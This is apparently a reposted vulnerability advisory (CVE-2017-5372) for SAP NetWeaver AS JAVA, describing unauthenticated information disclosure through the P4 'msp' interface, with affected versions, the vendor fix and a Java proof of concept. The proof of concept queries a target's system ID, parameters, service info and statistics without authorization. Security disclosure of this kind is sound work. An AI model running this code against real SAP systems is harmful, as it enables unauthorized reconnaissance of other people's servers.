An anonymous attacker can send a special request and get sensitive information about an SAP system using SAP P4.
Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.11-7.4
Vendor URL: http://SAP.com
Bugs: Information disclosure
Sent: 10.03.2016
Reported: 11.03.2016
Vendor response: 11.03.2016
Date of Public Advisory: 12.10.2016
Reference: SAP Security Note 2331908
Author: Vahagn @vah_13 Vardanyan (ERPScan)
Description
1. ADVISORY INFORMATION
Title:[ERPSCAN-16-037] SAP NetWeaver AS JAVA P4 MSPRUNTIMEINTERFACE
INFORMATION DISCLOSURE
Advisory ID:[ERPSCAN-16-037]
Risk: high
Advisory URL:
https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
Date published: 11.01.2017
Vendors contacted: SAP
2. VULNERABILITY INFORMATION
Class: Information disclosure
Impact: broken authentication
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-5372
CVSS Information
CVSS Base Score v3: 7.3 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) Low (L)
PR : Privileges Required (Level of privileges needed to exploit) None (N)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond the
vulnerable component) Unchanged (U)
C : Impact to Confidentiality Low (L)
I : Impact to Integrity Low (L)
A : Impact to Availability Low (L)
3. VULNERABILITY DESCRIPTION
Anonymous attacker can send a special request and get sensitive information
about an SAP system using SAP P4.
4. VULNERABLE PACKAGES
SERVERCORE
7.11
7.20
7.30
7.31
7.40
7.50
5. SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2331908
6. AUTHOR
Vahagn Vardanyan (ERPScan)
7. TECHNICAL DESCRIPTION
SAP AS JAVA P4 function msp (MSPRuntimeInterface) does not require any
authorization to call the following functions:
getInformation
getParameters
getServiceInfo
getStatistic
getClientStatistic
PoC (Java language)
package sap_p4_poc;
*****
Properties p = new Properties();
p.put("java.naming.factory.initial",
"com.sap.engine.services.jndi.InitialContextFactoryImpl");
p.put("java.naming.provider.url", SAP_IP+":"+SAP_PORT);
InitialContext initialContext = new InitialContext(p);
Context initialContext = initialContext;
MSPRuntimeInterface serialObj =
(MSPRuntimeInterface)initialContext.lookup("msp");
System.out.println("----------------" + serialObj +
"----------------------------------------");
System.out.println("----------------SID:" + serialObj.getSystemId() +
"----------------------------------------");
System.out.println("----------------------getInformation:--------------------------------");
TreeMap Inf = serialObj.getInformation();
print_treee_map(Inf);
System.out.println("----------------------getParameters:----------------------------------");
TreeMap Par = serialObj.getParameters();
print_treee_map(Par);
System.out.println("-----------------------getServiceInfo:---------------------------------");
TreeMap Serv = serialObj.getServiceInfo();
print_treee_map(Serv);
System.out.println("-----------------------getStatistic:---------------------------------");
TreeMap Stat = serialObj.getStatistic();
print_treee_map(Stat);
System.out.println("-----------------------getClientStatistic:---------------------------------");
TreeMap Cli = serialObj.getClientStatistic();
print_treee_map(Cli);
8. REPORT TIMELINE
Reported: 11.03.2016
Vendor response: 11.03.2016
Date of Public Advisory: 12.10.2016
9. REFERENCES
https://erpscan.com/advisories/erpscan-16-037-sap-java-p4-mspruntimeinterface-information-disclosure/
# 0day.today [2018-02-20] #